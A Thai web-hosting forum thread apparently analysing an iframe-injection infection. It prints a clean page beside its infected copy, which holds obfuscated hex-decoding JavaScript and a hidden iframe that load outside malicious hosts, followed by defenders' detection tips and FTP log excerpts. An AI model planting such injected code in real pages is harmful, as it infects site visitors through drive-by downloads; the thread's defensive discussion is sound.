Iframe ชนิดใหม่

ต้นฉบับ

<meta Http-equiv=“content-type” Content=“text/html; Charset=windows-874”>
<meta Http-equiv=“refresh” Content=“1; Url=index.php”>
<center>

…Please wait…</center>

ที่ถูกแก้ไข

<meta Http-equiv=“content-type” Content=“text/html; Charset=windows-874”>
<meta Http-equiv=“refresh” Content=“1; Url=index.php”>
<center>

…Please wait…</center>
<div style=“display:none”>xferwlvhonghczrymjzdkbjlhrkmmxl</div>
<div style=“display:none”>ozhmrvsybsprnnurajhncvoqlqcvitr</div>
<div style=“display:none”>ngexzbifaobvdvneybrldvigfkgxxuu</div>
<meta Http-equiv=“content-type” Content=“text/html; Charset=windows-874”>
<meta Http-equiv=“refresh” Content=“1; Url=index.php”>
<center>

…Please wait…</center>
<div style=“display:none”>sdsdizkjwupboubydnsdwbgdymqteak</div>
<div style=“display:none”>edougcaawgzpdioimeohfoethoimpfu</div>
<div style=“display:none”>gfvcgnsfpytwpnsprliflhurrglazvm</div><script>function v4ac70415d55d5(v4ac70415d59b8){ var v4ac70415d5da0=16; return(parseInt(v4ac70415d59b8,v4ac70415d5da0));}function v4ac70415d6570(v4ac70415d6958){ function v4ac70415d750f () {return 2;} var v4ac70415d6d40=‘’;for(v4ac70415d7127=0; v4ac70415d7127<v4ac70415d6958.length; v4ac70415d7127+=v4ac70415d750f()){ v4ac70415d6d40+=(String.fromCharCode(v4ac70415d55d5(v4ac70415d6958.substr(v4ac70415d7127, v4ac70415d750f()))));}return v4ac70415d6d40;} document.write(v4ac70415d6570(‘3C696672616D65206E616D653D27313527207372633D27687474703A2F2F6E62616B6F66662E636F6D2F696E2E6367693F3131272077696474683D333630206865696768743D343036207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E’));</script>
<div style=“display:none”>ovmlutdjidyyaubprlgiivhjjaljodj</div>
<div style=“display:none”>ejrqnyrpsuplihcyigqboarvfetopwi</div>
<div style=“display:none”>qhvlmxlqlrqxdefmaugunykegaanvrk</div>
<div style=“display:none”>zfqldcuotnxopxmhsoowgiscgtaekrq</div>
<div style=“display:none”>llvcrkqetoxksjrzlrmxnjdhxovrngs</div>
<div style=“display:none”>jeuxewziyigbrxrsujhzadwcotpwufg</div>
<div style=“display:none”>otoqstlmfxecjllzigwjxavakvkeioj<iframe width=557 height=879 src=“http://beofree.ru:8080/index.php” ></iframe></div>

สังเกตุ ตัวสีแดงครับ

เดี๋ยวนี้มันพัฒนาแล้ว
lol lol

นั่นสิครับ ผมชักจะเหนื่อยแล้วสิ

มันน่าจะมี antivirus ที่สามารถป้องกันเข้ามาได้นะครับ ที่ผมใช้อยู่ก็ได้แค่detectอย่างเดียวครับ

มันกลัวโดน regex ตอนใช้สคริปลบ iframe อ่าสิ

-0-

ขอบคุณสำหรับข้อมูลครับ

พัฒนาไวจริงๆ Virus เนี่ย

ตัวนี้จัดการง่ายครับ
อาจจะหา <div style=“display:none”>
หรือ <iframe หรือ script ได้จัดได้อยู่ครับ
หนักๆ ต้องเจอพวกใน php เห่อหนัก

แค่เจอแทรก script php ตอน connect database
ทำให้ connect นานมากๆ

ตัวนี้ผมเห็นมาแล้วครับ

ปัญหา iframe นั้น เดี๋ยวนี้ ผมให้เจ้าหน้าที่ดู ftp log ทุกวันจันทร์ ถ้า user โดน ผมจะทำการ change password และติดต่อลูกค้าทันที

ขอบคุณมากสำหรับข้อมูลครับ

มีวิธีสังเกตุไหมครับ

ยังพัฒนาได้ไม่ดีพอ เพราะ

1. ยังมีคำว่า iframe
2. มี .ru:8080

<iframe width=557 height=879 src="http://beofree.ru:8080/index.php" ></iframe>

ปกติผม scan หาคำว่า iframe กับ :8080

thz02.thzhost.com (94.72.114.36[94.72.114.36]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (188.26.222.99[188.26.222.99]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (92.249.210.88[92.249.210.88]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (85.14.73.140[85.14.73.140]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (83.93.47.169[83.93.47.169]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (89.76.165.67[89.76.165.67]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (94.112.29.36[94.112.29.36]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (94.21.94.173[94.21.94.173]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (83.233.59.53[83.233.59.53]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (85.28.149.105[85.28.149.105]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (147.175.22.86[147.175.22.86]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (78.131.40.115[78.131.40.115]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (89.103.78.79[89.103.78.79]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (89.133.23.152[89.133.23.152]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (89.190.59.126[89.190.59.126]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (195.117.90.52[195.117.90.52]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (83.176.251.53[83.176.251.53]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (82.181.186.254[82.181.186.254]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (86.106.94.51[86.106.94.51]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (84.42.229.95[84.42.229.95]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (213.175.76.232[213.175.76.232]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (89.133.70.154[89.133.70.154]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (83.87.28.226[83.87.28.226]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (94.244.180.166[94.244.180.166]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (84.236.23.105[84.236.23.105]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (62.31.162.75[62.31.162.75]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’
thz02.thzhost.com (77.221.93.152[77.221.93.152]) - Preparing to chroot to directory ‘/var/www/vhosts/DOMAIN.COM’

ของ plesk มันจะขึ้นอะไรประมาณเนี้ยอะครับ สรุปส่งมาให้ logwatch ทุกวัน

โดนมามะกี้นี้เลย หุหุ